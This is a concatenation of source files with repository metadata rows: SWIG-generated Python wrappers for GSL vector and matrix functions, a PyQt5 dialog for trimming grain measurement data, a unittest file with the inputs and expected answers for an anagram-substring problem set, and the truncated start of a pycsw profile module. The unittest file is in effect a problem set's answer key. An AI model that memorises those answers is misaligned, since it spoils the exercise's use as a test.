def gsl_matrix_short_fwrite(*args, **kwargs):
return __block.gsl_matrix_short_fwrite(*args, **kwargs)
gsl_matrix_short_fwrite = __block.gsl_matrix_short_fwrite
def gsl_matrix_short_fscanf(*args, **kwargs):
return __block.gsl_matrix_short_fscanf(*args, **kwargs)
gsl_matrix_short_fscanf = __block.gsl_matrix_short_fscanf
def gsl_matrix_short_fprintf(*args, **kwargs):
return __block.gsl_matrix_short_fprintf(*args, **kwargs)
gsl_matrix_short_fprintf = __block.gsl_matrix_short_fprintf
def gsl_matrix_short_swap(*args, **kwargs):
return __block.gsl_matrix_short_swap(*args, **kwargs)
gsl_matrix_short_swap = __block.gsl_matrix_short_swap
def gsl_matrix_short_swap_rows(*args, **kwargs):
return __block.gsl_matrix_short_swap_rows(*args, **kwargs)
gsl_matrix_short_swap_rows = __block.gsl_matrix_short_swap_rows
def gsl_matrix_short_swap_columns(*args, **kwargs):
return __block.gsl_matrix_short_swap_columns(*args, **kwargs)
gsl_matrix_short_swap_columns = __block.gsl_matrix_short_swap_columns
def gsl_matrix_short_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_short_swap_rowcol(*args, **kwargs)
gsl_matrix_short_swap_rowcol = __block.gsl_matrix_short_swap_rowcol
def gsl_matrix_short_transpose(*args, **kwargs):
return __block.gsl_matrix_short_transpose(*args, **kwargs)
gsl_matrix_short_transpose = __block.gsl_matrix_short_transpose
def gsl_matrix_short_max(*args, **kwargs):
return __block.gsl_matrix_short_max(*args, **kwargs)
gsl_matrix_short_max = __block.gsl_matrix_short_max
def gsl_matrix_short_min(*args, **kwargs):
return __block.gsl_matrix_short_min(*args, **kwargs)
gsl_matrix_short_min = __block.gsl_matrix_short_min
def gsl_matrix_short_minmax(*args, **kwargs):
return __block.gsl_matrix_short_minmax(*args, **kwargs)
gsl_matrix_short_minmax = __block.gsl_matrix_short_minmax
def gsl_matrix_short_max_index(*args, **kwargs):
return __block.gsl_matrix_short_max_index(*args, **kwargs)
gsl_matrix_short_max_index = __block.gsl_matrix_short_max_index
def gsl_matrix_short_min_index(*args, **kwargs):
return __block.gsl_matrix_short_min_index(*args, **kwargs)
gsl_matrix_short_min_index = __block.gsl_matrix_short_min_index
def gsl_matrix_short_minmax_index(*args, **kwargs):
return __block.gsl_matrix_short_minmax_index(*args, **kwargs)
gsl_matrix_short_minmax_index = __block.gsl_matrix_short_minmax_index
def gsl_matrix_short_isnull(*args, **kwargs):
return __block.gsl_matrix_short_isnull(*args, **kwargs)
gsl_matrix_short_isnull = __block.gsl_matrix_short_isnull
def gsl_matrix_short_diagonal(*args, **kwargs):
return __block.gsl_matrix_short_diagonal(*args, **kwargs)
gsl_matrix_short_diagonal = __block.gsl_matrix_short_diagonal
def gsl_matrix_short_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_short_subdiagonal(*args, **kwargs)
gsl_matrix_short_subdiagonal = __block.gsl_matrix_short_subdiagonal
def gsl_matrix_short_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_short_superdiagonal(*args, **kwargs)
gsl_matrix_short_superdiagonal = __block.gsl_matrix_short_superdiagonal
def gsl_vector_char_set_zero(*args, **kwargs):
return __block.gsl_vector_char_set_zero(*args, **kwargs)
gsl_vector_char_set_zero = __block.gsl_vector_char_set_zero
def gsl_vector_char_set_all(*args, **kwargs):
return __block.gsl_vector_char_set_all(*args, **kwargs)
gsl_vector_char_set_all = __block.gsl_vector_char_set_all
def gsl_vector_char_set_basis(*args, **kwargs):
return __block.gsl_vector_char_set_basis(*args, **kwargs)
gsl_vector_char_set_basis = __block.gsl_vector_char_set_basis
def gsl_vector_char_fread(*args, **kwargs):
return __block.gsl_vector_char_fread(*args, **kwargs)
gsl_vector_char_fread = __block.gsl_vector_char_fread
def gsl_vector_char_fwrite(*args, **kwargs):
return __block.gsl_vector_char_fwrite(*args, **kwargs)
gsl_vector_char_fwrite = __block.gsl_vector_char_fwrite
def gsl_vector_char_fscanf(*args, **kwargs):
return __block.gsl_vector_char_fscanf(*args, **kwargs)
gsl_vector_char_fscanf = __block.gsl_vector_char_fscanf
def gsl_vector_char_fprintf(*args, **kwargs):
return __block.gsl_vector_char_fprintf(*args, **kwargs)
gsl_vector_char_fprintf = __block.gsl_vector_char_fprintf
def gsl_vector_char_reverse(*args, **kwargs):
return __block.gsl_vector_char_reverse(*args, **kwargs)
gsl_vector_char_reverse = __block.gsl_vector_char_reverse
def gsl_vector_char_swap(*args, **kwargs):
return __block.gsl_vector_char_swap(*args, **kwargs)
gsl_vector_char_swap = __block.gsl_vector_char_swap
def gsl_vector_char_swap_elements(*args, **kwargs):
return __block.gsl_vector_char_swap_elements(*args, **kwargs)
gsl_vector_char_swap_elements = __block.gsl_vector_char_swap_elements
def gsl_vector_char_max(*args, **kwargs):
return __block.gsl_vector_char_max(*args, **kwargs)
gsl_vector_char_max = __block.gsl_vector_char_max
def gsl_vector_char_min(*args, **kwargs):
return __block.gsl_vector_char_min(*args, **kwargs)
gsl_vector_char_min = __block.gsl_vector_char_min
def gsl_vector_char_minmax(*args, **kwargs):
return __block.gsl_vector_char_minmax(*args, **kwargs)
gsl_vector_char_minmax = __block.gsl_vector_char_minmax
def gsl_vector_char_max_index(*args, **kwargs):
return __block.gsl_vector_char_max_index(*args, **kwargs)
gsl_vector_char_max_index = __block.gsl_vector_char_max_index
def gsl_vector_char_min_index(*args, **kwargs):
return __block.gsl_vector_char_min_index(*args, **kwargs)
gsl_vector_char_min_index = __block.gsl_vector_char_min_index
def gsl_vector_char_minmax_index(*args, **kwargs):
return __block.gsl_vector_char_minmax_index(*args, **kwargs)
gsl_vector_char_minmax_index = __block.gsl_vector_char_minmax_index
def gsl_vector_char_isnull(*args, **kwargs):
return __block.gsl_vector_char_isnull(*args, **kwargs)
gsl_vector_char_isnull = __block.gsl_vector_char_isnull
def gsl_matrix_char_set_zero(*args, **kwargs):
return __block.gsl_matrix_char_set_zero(*args, **kwargs)
gsl_matrix_char_set_zero = __block.gsl_matrix_char_set_zero
def gsl_matrix_char_set_all(*args, **kwargs):
return __block.gsl_matrix_char_set_all(*args, **kwargs)
gsl_matrix_char_set_all = __block.gsl_matrix_char_set_all
def gsl_matrix_char_set_identity(*args, **kwargs):
return __block.gsl_matrix_char_set_identity(*args, **kwargs)
gsl_matrix_char_set_identity = __block.gsl_matrix_char_set_identity
def gsl_matrix_char_fread(*args, **kwargs):
return __block.gsl_matrix_char_fread(*args, **kwargs)
gsl_matrix_char_fread = __block.gsl_matrix_char_fread
def gsl_matrix_char_fwrite(*args, **kwargs):
return __block.gsl_matrix_char_fwrite(*args, **kwargs)
gsl_matrix_char_fwrite = __block.gsl_matrix_char_fwrite
def gsl_matrix_char_fscanf(*args, **kwargs):
return __block.gsl_matrix_char_fscanf(*args, **kwargs)
gsl_matrix_char_fscanf = __block.gsl_matrix_char_fscanf
def gsl_matrix_char_fprintf(*args, **kwargs):
return __block.gsl_matrix_char_fprintf(*args, **kwargs)
gsl_matrix_char_fprintf = __block.gsl_matrix_char_fprintf
def gsl_matrix_char_swap(*args, **kwargs):
return __block.gsl_matrix_char_swap(*args, **kwargs)
gsl_matrix_char_swap = __block.gsl_matrix_char_swap
def gsl_matrix_char_swap_rows(*args, **kwargs):
return __block.gsl_matrix_char_swap_rows(*args, **kwargs)
gsl_matrix_char_swap_rows = __block.gsl_matrix_char_swap_rows
def gsl_matrix_char_swap_columns(*args, **kwargs):
return __block.gsl_matrix_char_swap_columns(*args, **kwargs)
gsl_matrix_char_swap_columns = __block.gsl_matrix_char_swap_columns
def gsl_matrix_char_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_char_swap_rowcol(*args, **kwargs)
gsl_matrix_char_swap_rowcol = __block.gsl_matrix_char_swap_rowcol
def gsl_matrix_char_transpose(*args, **kwargs):
return __block.gsl_matrix_char_transpose(*args, **kwargs)
gsl_matrix_char_transpose = __block.gsl_matrix_char_transpose
def gsl_matrix_char_max(*args, **kwargs):
return __block.gsl_matrix_char_max(*args, **kwargs)
gsl_matrix_char_max = __block.gsl_matrix_char_max
def gsl_matrix_char_min(*args, **kwargs):
return __block.gsl_matrix_char_min(*args, **kwargs)
gsl_matrix_char_min = __block.gsl_matrix_char_min
def gsl_matrix_char_minmax(*args, **kwargs):
return __block.gsl_matrix_char_minmax(*args, **kwargs)
gsl_matrix_char_minmax = __block.gsl_matrix_char_minmax
def gsl_matrix_char_max_index(*args, **kwargs):
return __block.gsl_matrix_char_max_index(*args, **kwargs)
gsl_matrix_char_max_index = __block.gsl_matrix_char_max_index
def gsl_matrix_char_min_index(*args, **kwargs):
return __block.gsl_matrix_char_min_index(*args, **kwargs)
gsl_matrix_char_min_index = __block.gsl_matrix_char_min_index
def gsl_matrix_char_minmax_index(*args, **kwargs):
return __block.gsl_matrix_char_minmax_index(*args, **kwargs)
gsl_matrix_char_minmax_index = __block.gsl_matrix_char_minmax_index
def gsl_matrix_char_isnull(*args, **kwargs):
return __block.gsl_matrix_char_isnull(*args, **kwargs)
gsl_matrix_char_isnull = __block.gsl_matrix_char_isnull
def gsl_matrix_char_diagonal(*args, **kwargs):
return __block.gsl_matrix_char_diagonal(*args, **kwargs)
gsl_matrix_char_diagonal = __block.gsl_matrix_char_diagonal
def gsl_matrix_char_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_char_subdiagonal(*args, **kwargs)
gsl_matrix_char_subdiagonal = __block.gsl_matrix_char_subdiagonal
def gsl_matrix_char_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_char_superdiagonal(*args, **kwargs)
gsl_matrix_char_superdiagonal = __block.gsl_matrix_char_superdiagonal
def gsl_vector_complex_set_zero(*args, **kwargs):
return __block.gsl_vector_complex_set_zero(*args, **kwargs)
gsl_vector_complex_set_zero = __block.gsl_vector_complex_set_zero
def gsl_vector_complex_set_all(*args, **kwargs):
return __block.gsl_vector_complex_set_all(*args, **kwargs)
gsl_vector_complex_set_all = __block.gsl_vector_complex_set_all
def gsl_vector_complex_set_basis(*args, **kwargs):
return __block.gsl_vector_complex_set_basis(*args, **kwargs)
gsl_vector_complex_set_basis = __block.gsl_vector_complex_set_basis
def gsl_vector_complex_fread(*args, **kwargs):
return __block.gsl_vector_complex_fread(*args, **kwargs)
gsl_vector_complex_fread = __block.gsl_vector_complex_fread
def gsl_vector_complex_fwrite(*args, **kwargs):
return __block.gsl_vector_complex_fwrite(*args, **kwargs)
gsl_vector_complex_fwrite = __block.gsl_vector_complex_fwrite
def gsl_vector_complex_fscanf(*args, **kwargs):
return __block.gsl_vector_complex_fscanf(*args, **kwargs)
gsl_vector_complex_fscanf = __block.gsl_vector_complex_fscanf
def gsl_vector_complex_fprintf(*args, **kwargs):
return __block.gsl_vector_complex_fprintf(*args, **kwargs)
gsl_vector_complex_fprintf = __block.gsl_vector_complex_fprintf
def gsl_vector_complex_reverse(*args, **kwargs):
return __block.gsl_vector_complex_reverse(*args, **kwargs)
gsl_vector_complex_reverse = __block.gsl_vector_complex_reverse
def gsl_vector_complex_swap(*args, **kwargs):
return __block.gsl_vector_complex_swap(*args, **kwargs)
gsl_vector_complex_swap = __block.gsl_vector_complex_swap
def gsl_vector_complex_swap_elements(*args, **kwargs):
return __block.gsl_vector_complex_swap_elements(*args, **kwargs)
gsl_vector_complex_swap_elements = __block.gsl_vector_complex_swap_elements
def gsl_vector_complex_isnull(*args, **kwargs):
return __block.gsl_vector_complex_isnull(*args, **kwargs)
gsl_vector_complex_isnull = __block.gsl_vector_complex_isnull
def gsl_matrix_complex_set_zero(*args, **kwargs):
return __block.gsl_matrix_complex_set_zero(*args, **kwargs)
gsl_matrix_complex_set_zero = __block.gsl_matrix_complex_set_zero
def gsl_matrix_complex_set_all(*args, **kwargs):
return __block.gsl_matrix_complex_set_all(*args, **kwargs)
gsl_matrix_complex_set_all = __block.gsl_matrix_complex_set_all
def gsl_matrix_complex_set_identity(*args, **kwargs):
return __block.gsl_matrix_complex_set_identity(*args, **kwargs)
gsl_matrix_complex_set_identity = __block.gsl_matrix_complex_set_identity
def gsl_matrix_complex_fread(*args, **kwargs):
return __block.gsl_matrix_complex_fread(*args, **kwargs)
gsl_matrix_complex_fread = __block.gsl_matrix_complex_fread
def gsl_matrix_complex_fwrite(*args, **kwargs):
return __block.gsl_matrix_complex_fwrite(*args, **kwargs)
gsl_matrix_complex_fwrite = __block.gsl_matrix_complex_fwrite
def gsl_matrix_complex_fscanf(*args, **kwargs):
return __block.gsl_matrix_complex_fscanf(*args, **kwargs)
gsl_matrix_complex_fscanf = __block.gsl_matrix_complex_fscanf
def gsl_matrix_complex_fprintf(*args, **kwargs):
return __block.gsl_matrix_complex_fprintf(*args, **kwargs)
gsl_matrix_complex_fprintf = __block.gsl_matrix_complex_fprintf
def gsl_matrix_complex_swap(*args, **kwargs):
return __block.gsl_matrix_complex_swap(*args, **kwargs)
gsl_matrix_complex_swap = __block.gsl_matrix_complex_swap
def gsl_matrix_complex_swap_rows(*args, **kwargs):
return __block.gsl_matrix_complex_swap_rows(*args, **kwargs)
gsl_matrix_complex_swap_rows = __block.gsl_matrix_complex_swap_rows
def gsl_matrix_complex_swap_columns(*args, **kwargs):
return __block.gsl_matrix_complex_swap_columns(*args, **kwargs)
gsl_matrix_complex_swap_columns = __block.gsl_matrix_complex_swap_columns
def gsl_matrix_complex_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_complex_swap_rowcol(*args, **kwargs)
gsl_matrix_complex_swap_rowcol = __block.gsl_matrix_complex_swap_rowcol
def gsl_matrix_complex_transpose(*args, **kwargs):
return __block.gsl_matrix_complex_transpose(*args, **kwargs)
gsl_matrix_complex_transpose = __block.gsl_matrix_complex_transpose
def gsl_matrix_complex_isnull(*args, **kwargs):
return __block.gsl_matrix_complex_isnull(*args, **kwargs)
gsl_matrix_complex_isnull = __block.gsl_matrix_complex_isnull
def gsl_matrix_complex_diagonal(*args, **kwargs):
return __block.gsl_matrix_complex_diagonal(*args, **kwargs)
gsl_matrix_complex_diagonal = __block.gsl_matrix_complex_diagonal
def gsl_matrix_complex_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_subdiagonal(*args, **kwargs)
gsl_matrix_complex_subdiagonal = __block.gsl_matrix_complex_subdiagonal
def gsl_matrix_complex_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_superdiagonal(*args, **kwargs)
gsl_matrix_complex_superdiagonal = __block.gsl_matrix_complex_superdiagonal
def gsl_vector_complex_float_set_zero(*args, **kwargs):
return __block.gsl_vector_complex_float_set_zero(*args, **kwargs)
gsl_vector_complex_float_set_zero = __block.gsl_vector_complex_float_set_zero
def gsl_vector_complex_float_set_all(*args, **kwargs):
return __block.gsl_vector_complex_float_set_all(*args, **kwargs)
gsl_vector_complex_float_set_all = __block.gsl_vector_complex_float_set_all
def gsl_vector_complex_float_set_basis(*args, **kwargs):
return __block.gsl_vector_complex_float_set_basis(*args, **kwargs)
gsl_vector_complex_float_set_basis = __block.gsl_vector_complex_float_set_basis
def gsl_vector_complex_float_fread(*args, **kwargs):
return __block.gsl_vector_complex_float_fread(*args, **kwargs)
gsl_vector_complex_float_fread = __block.gsl_vector_complex_float_fread
def gsl_vector_complex_float_fwrite(*args, **kwargs):
return __block.gsl_vector_complex_float_fwrite(*args, **kwargs)
gsl_vector_complex_float_fwrite = __block.gsl_vector_complex_float_fwrite
def gsl_vector_complex_float_fscanf(*args, **kwargs):
return __block.gsl_vector_complex_float_fscanf(*args, **kwargs)
gsl_vector_complex_float_fscanf = __block.gsl_vector_complex_float_fscanf
def gsl_vector_complex_float_fprintf(*args, **kwargs):
return __block.gsl_vector_complex_float_fprintf(*args, **kwargs)
gsl_vector_complex_float_fprintf = __block.gsl_vector_complex_float_fprintf
def gsl_vector_complex_float_reverse(*args, **kwargs):
return __block.gsl_vector_complex_float_reverse(*args, **kwargs)
gsl_vector_complex_float_reverse = __block.gsl_vector_complex_float_reverse
def gsl_vector_complex_float_swap(*args, **kwargs):
return __block.gsl_vector_complex_float_swap(*args, **kwargs)
gsl_vector_complex_float_swap = __block.gsl_vector_complex_float_swap
def gsl_vector_complex_float_swap_elements(*args, **kwargs):
return __block.gsl_vector_complex_float_swap_elements(*args, **kwargs)
gsl_vector_complex_float_swap_elements = __block.gsl_vector_complex_float_swap_elements
def gsl_vector_complex_float_isnull(*args, **kwargs):
return __block.gsl_vector_complex_float_isnull(*args, **kwargs)
gsl_vector_complex_float_isnull = __block.gsl_vector_complex_float_isnull
def gsl_matrix_complex_float_set_zero(*args, **kwargs):
return __block.gsl_matrix_complex_float_set_zero(*args, **kwargs)
gsl_matrix_complex_float_set_zero = __block.gsl_matrix_complex_float_set_zero
def gsl_matrix_complex_float_set_all(*args, **kwargs):
return __block.gsl_matrix_complex_float_set_all(*args, **kwargs)
gsl_matrix_complex_float_set_all = __block.gsl_matrix_complex_float_set_all
def gsl_matrix_complex_float_set_identity(*args, **kwargs):
return __block.gsl_matrix_complex_float_set_identity(*args, **kwargs)
gsl_matrix_complex_float_set_identity = __block.gsl_matrix_complex_float_set_identity
def gsl_matrix_complex_float_fread(*args, **kwargs):
return __block.gsl_matrix_complex_float_fread(*args, **kwargs)
gsl_matrix_complex_float_fread = __block.gsl_matrix_complex_float_fread
def gsl_matrix_complex_float_fwrite(*args, **kwargs):
return __block.gsl_matrix_complex_float_fwrite(*args, **kwargs)
gsl_matrix_complex_float_fwrite = __block.gsl_matrix_complex_float_fwrite
def gsl_matrix_complex_float_fscanf(*args, **kwargs):
return __block.gsl_matrix_complex_float_fscanf(*args, **kwargs)
gsl_matrix_complex_float_fscanf = __block.gsl_matrix_complex_float_fscanf
def gsl_matrix_complex_float_fprintf(*args, **kwargs):
return __block.gsl_matrix_complex_float_fprintf(*args, **kwargs)
gsl_matrix_complex_float_fprintf = __block.gsl_matrix_complex_float_fprintf
def gsl_matrix_complex_float_swap(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap(*args, **kwargs)
gsl_matrix_complex_float_swap = __block.gsl_matrix_complex_float_swap
def gsl_matrix_complex_float_swap_rows(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap_rows(*args, **kwargs)
gsl_matrix_complex_float_swap_rows = __block.gsl_matrix_complex_float_swap_rows
def gsl_matrix_complex_float_swap_columns(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap_columns(*args, **kwargs)
gsl_matrix_complex_float_swap_columns = __block.gsl_matrix_complex_float_swap_columns
def gsl_matrix_complex_float_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap_rowcol(*args, **kwargs)
gsl_matrix_complex_float_swap_rowcol = __block.gsl_matrix_complex_float_swap_rowcol
def gsl_matrix_complex_float_transpose(*args, **kwargs):
return __block.gsl_matrix_complex_float_transpose(*args, **kwargs)
gsl_matrix_complex_float_transpose = __block.gsl_matrix_complex_float_transpose
def gsl_matrix_complex_float_isnull(*args, **kwargs):
return __block.gsl_matrix_complex_float_isnull(*args, **kwargs)
gsl_matrix_complex_float_isnull = __block.gsl_matrix_complex_float_isnull
def gsl_matrix_complex_float_diagonal(*args, **kwargs):
return __block.gsl_matrix_complex_float_diagonal(*args, **kwargs)
gsl_matrix_complex_float_diagonal = __block.gsl_matrix_complex_float_diagonal
def gsl_matrix_complex_float_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_float_subdiagonal(*args, **kwargs)
gsl_matrix_complex_float_subdiagonal = __block.gsl_matrix_complex_float_subdiagonal
def gsl_matrix_complex_float_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_float_superdiagonal(*args, **kwargs)
gsl_matrix_complex_float_superdiagonal = __block.gsl_matrix_complex_float_superdiagonal
# This file is compatible with both classic and new-style classes.
| 41.161369 | 90 | 0.825542 |
4d42f4da01153d9efccca4d19cc6efc9b683c41b
| 8,039 |
py
|
Python
|
gui/trimGui.py
|
lhalb/gfmanager
|
449f071b3239faa672b7f06122dfc9bc23e68d79
|
[
"MIT"
] | 1 |
2022-01-18T12:53:17.000Z
|
2022-01-18T12:53:17.000Z
|
gui/trimGui.py
|
lhalb/gfmanager
|
449f071b3239faa672b7f06122dfc9bc23e68d79
|
[
"MIT"
] | null | null | null |
gui/trimGui.py
|
lhalb/gfmanager
|
449f071b3239faa672b7f06122dfc9bc23e68d79
|
[
"MIT"
] | null | null | null |
from PyQt5 import QtGui, QtWidgets
import seaborn as sns
from gui import trimming as tri
from gui import boxes as BOX
import matplotlib.image as mpimg
from math import floor, ceil
class TrimDialog(QtWidgets.QDialog, tri.Ui_Dialog):
def __init__(self, data=None):
super(TrimDialog, self).__init__()
self.setupUi(self)
# Setze icon
icon = QtGui.QIcon(":/img/icons/trim.png")
self.setWindowIcon(icon)
self.trim_data = data
self.cal_val = 1
# Fill Combo-Box
additems = [i for i in data.columns if i not in ['pos-x', 'pos-y', 'edge']]
self.cb_cols.addItems(additems)
# Init Data-Plot
self.plt_data = self.dataPlot.canvas
self.data_ax = self.plt_data.fig.add_subplot(111)
self.init_slider()
self.update_violin()
self.vline = self.data_ax.axvline(data[self.cb_cols.currentText()].min(), color='r')
self.vline_max = self.data_ax.axvline(ceil(data[self.cb_cols.currentText()].max()), color='b')
# Init Image-Plot
self.imagePlot.hide()
self.plt_image = self.imagePlot.canvas
self.image_ax = self.plt_image.fig.add_subplot(111)
self.scat, = self.image_ax.plot([], [], marker='o', ms=5, ls='', color='r')
# trigger am Ende laden
self.setup_triggers()
def setup_triggers(self):
self.sliderTRIM_min.valueChanged.connect(self.update_data)
self.sliderTRIM_max.valueChanged.connect(self.update_data)
self.but_openImage.clicked.connect(self.load_image)
self.cb_cols.currentTextChanged.connect(self.update_element)
self.cb_edgeGrains.clicked.connect(self.update_element)
self.txt_kalwert.returnPressed.connect(self.update_cal_val)
self.lab_cut_min.editingFinished.connect(self.set_min_slider)
self.lab_cut_max.editingFinished.connect(self.set_max_slider)
self.but_cut_min.clicked.connect(self.manipulate_max)
self.but_cut_max.clicked.connect(self.manipulate_min)
def update_element(self):
self.update_violin()
self.init_vline()
bool_max = self.but_cut_min.isChecked()
bool_min = self.but_cut_max.isChecked()
self.init_slider(h_max=bool_max, h_min=bool_min)
self.update_scatter_data()
def update_violin(self):
self.data_ax.clear()
curr_text = self.cb_cols.currentText()
if self.cb_edgeGrains.isChecked():
corr_data = self.trim_data[self.trim_data['edge'] == 0]
else:
corr_data = self.trim_data
data = corr_data[curr_text]
sns.violinplot(x=data, ax=self.data_ax, cut=0)
self.plt_data.fig.tight_layout()
self.plt_data.draw_idle()
def init_vline(self):
curr_text = self.cb_cols.currentText()
min_val = self.trim_data[curr_text].min()
max_val = self.trim_data[curr_text].max()
self.vline = self.data_ax.axvline(min_val, color='r')
self.vline_max = self.data_ax.axvline(max_val, color='b')
self.plt_data.draw_idle()
def init_slider(self, h_min=False, h_max=False):
sli_min = self.sliderTRIM_min
sli_max = self.sliderTRIM_max
curr_text = self.cb_cols.currentText()
if self.cb_edgeGrains.isChecked():
data = self.trim_data[self.trim_data['edge'] == 0]
else:
data = self.trim_data
min_val = floor(data[curr_text].min())
max_val = ceil(data[curr_text].max())
# Wenn die Mitte am Beginn der Daten liegen soll (nur Max-Slider aktiv)
if h_min and not h_max:
half_min = min_val
# Wenn die Mitte am Ende der Daten liegen soll (nur Min-Slider aktiv)
elif h_max and not h_min:
half_min = max_val
else:
half_min = floor((max_val-min_val)/2)
half_max = half_min + 1
sli_min.setMinimum(min_val)
sli_min.setMaximum(half_min)
if half_min != min_val and half_max != max_val:
if half_min > 10:
ticks = 10
else:
ticks = half_min - min_val
sli_min.setTickInterval(int((half_min-min_val)/ticks))
sli_max.setTickInterval(int((max_val-half_min)/ticks))
sli_max.setMinimum(half_max)
sli_max.setMaximum(max_val)
sli_min.setValue(min_val)
sli_max.setValue(max_val)
self.lab_cut_min.setText(str(min_val))
self.lab_cut_max.setText(str(max_val))
def update_vline_max(self):
act_val = self.sliderTRIM_max.value()
self.vline_max.set_xdata(act_val)
self.plt_data.draw_idle()
self.lab_cut_max.setText(str(act_val))
def update_vline(self):
act_val = self.sliderTRIM_min.value()
self.vline.set_xdata(act_val)
self.plt_data.draw_idle()
self.lab_cut_min.setText(str(act_val))
def load_image(self):
fname = QtWidgets.QFileDialog.getOpenFileName(self, 'Bilddatei laden',
filter='Bilddateien (*.png *.jpeg *.jpg *.bmp)')[0]
# Wenn Nutzer Dateipfadauswahl abbricht
if not fname:
return
img = mpimg.imread(fname)
y_max = img.shape[0]
x_max = img.shape[1]
x_cal = self.trim_data['pos-x'].max()/x_max
y_cal = self.trim_data['pos-y'].max() / y_max
self.cal_val = max(x_cal, y_cal)
self.txt_kalwert.setText(str(self.cal_val))
self.image_ax.imshow(img, origin='upper', extent=None)
self.plt_image.draw_idle()
self.plt_image.fig.tight_layout()
self.show_image_widget()
def update_cal_val(self):
self.cal_val = float(self.txt_kalwert.text())
def show_image_widget(self):
self.imagePlot.show()
def get_excluded_values(self):
data = self.trim_data
thresh_1 = self.sliderTRIM_min.value()
thresh_2 = self.sliderTRIM_max.value()
curr_text = self.cb_cols.currentText()
cond_1 = (data['edge'] == 1)
cond_2 = (data[curr_text] <= thresh_1) | (data[curr_text] >= thresh_2)
if self.cb_edgeGrains.isChecked():
cut_data = data.loc[cond_1 | cond_2]
else:
cut_data = data.loc[cond_2]
x_data = cut_data['pos-x'].values / self.cal_val
y_data = cut_data['pos-y'].values / self.cal_val
return x_data, y_data
def update_scatter_data(self):
x, y = self.get_excluded_values()
self.scat.set_xdata(x)
self.scat.set_ydata(y)
self.plt_image.draw_idle()
def update_data(self):
self.update_vline()
self.update_vline_max()
self.update_scatter_data()
def set_min_slider(self):
try:
val = int(self.lab_cut_min.text())
except ValueError:
BOX.show_error_box('Falscher Wert eingegeben.')
return
self.sliderTRIM_min.setValue(val)
self.update_data()
def set_max_slider(self):
try:
val = int(self.lab_cut_max.text())
except ValueError:
BOX.show_error_box('Falscher Wert eingegeben.')
return
self.sliderTRIM_max.setValue(val)
self.update_data()
def manipulate_max(self):
if self.but_cut_min.isChecked():
self.sliderTRIM_max.hide()
self.lab_cut_max.hide()
self.but_cut_max.hide()
self.init_slider(h_max=True)
else:
self.sliderTRIM_max.show()
self.lab_cut_max.show()
self.but_cut_min.show()
self.init_slider()
def manipulate_min(self):
if self.but_cut_max.isChecked():
self.sliderTRIM_min.hide()
self.lab_cut_min.hide()
self.but_cut_min.hide()
self.init_slider(h_min=True)
else:
self.sliderTRIM_min.show()
self.lab_cut_min.show()
self.but_cut_min.show()
self.init_slider()
| 32.812245 | 105 | 0.619729 |
4d4909137a8281abf00add12e7109af6453220fd
| 1,421 |
py
|
Python
|
intro_to_algos_2020_mit/ps3/tests.py
|
venu-gopal-myneni/assignments
|
871148ccaa6291539623fc7d3f9704cb497fbcb6
|
[
"MIT"
] | 1 |
2022-02-26T13:52:31.000Z
|
2022-02-26T13:52:31.000Z
|
assignments/ps3-template/tests.py
|
tallamjr/mit-6006
|
c2aa6bb48edef5800c0779ba2eebd697d44249b5
|
[
"MIT"
] | null | null | null |
assignments/ps3-template/tests.py
|
tallamjr/mit-6006
|
c2aa6bb48edef5800c0779ba2eebd697d44249b5
|
[
"MIT"
] | null | null | null |
import unittest
from count_anagram_substrings import count_anagram_substrings
tests = (
(
(
'esleastealaslatet',
('tesla',),
),
(3,),
),
(
(
'lrldrrrllddrrlllrddd',
('ldl', 'rld'),
),
(1, 3),
),
(
(
'kkkkkvvuvkvkkkvuuvkuukkuvvkukkvkkvuvukuk',
('vkuk', 'uvku', 'kukk'),
),
(5, 6, 1),
),
(
(
'trhtrthtrthhhrtthrtrhhhtrrrhhrthrrrttrrttrthhrrrrtrtthhhhrrrtrtthrttthrthhthrhrh',
('rrrht', 'tttrr', 'rttrr', 'rhrrr'),
),
(6, 5, 6, 1),
),
(
(
'hjjijjhhhihhjjhjjhijjihjjihijiiihhihjjjihjjiijjijjhhjijjiijhjihiijjiiiijhihihhiihhiiihhiijhhhiijhijj',
('jihjhj', 'hhjiii', 'ihjhhh', 'jjjiji'),
),
(10, 6, 2, 2),
),
)
def check(test):
args, staff_sol = test
student_sol = count_anagram_substrings(*args)
return staff_sol == student_sol
class TestCases(unittest.TestCase):
def test_01(self): self.assertTrue(check(tests[ 0]))
def test_02(self): self.assertTrue(check(tests[ 1]))
def test_03(self): self.assertTrue(check(tests[ 2]))
def test_04(self): self.assertTrue(check(tests[ 3]))
def test_05(self): self.assertTrue(check(tests[ 4]))
if __name__ == '__main__':
res = unittest.main(verbosity = 3, exit = False)
| 25.375 | 115 | 0.553835 |
422402f1cd18573550063c08ebfde34d14018e34
| 5,187 |
py
|
Python
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 118 |
2015-01-07T00:24:09.000Z
|
2022-03-19T15:35:43.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 319 |
2015-01-06T23:51:46.000Z
|
2022-03-20T11:22:57.000Z
|
pycsw/pycsw/plugins/profiles/profile.py
|
Geosoft2/Geosoftware-II-AALLH
|
bdb61d9a1111b9082ec2b9f309998c5f2166975e
|
[
"MIT"
] | 113 |
2015-01-07T00:42:23.000Z
|
2022-02-19T18:05:08.000Z
|
# -*- coding: utf-8 -*-
# =================================================================
#
# Authors: Tom Kralidis <[email protected]>
# Angelos Tzotsos <[email protected]>
#
# Copyright (c) 2015 Tom Kralidis
# Copyright (c) 2015 Angelos Tzotsos
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
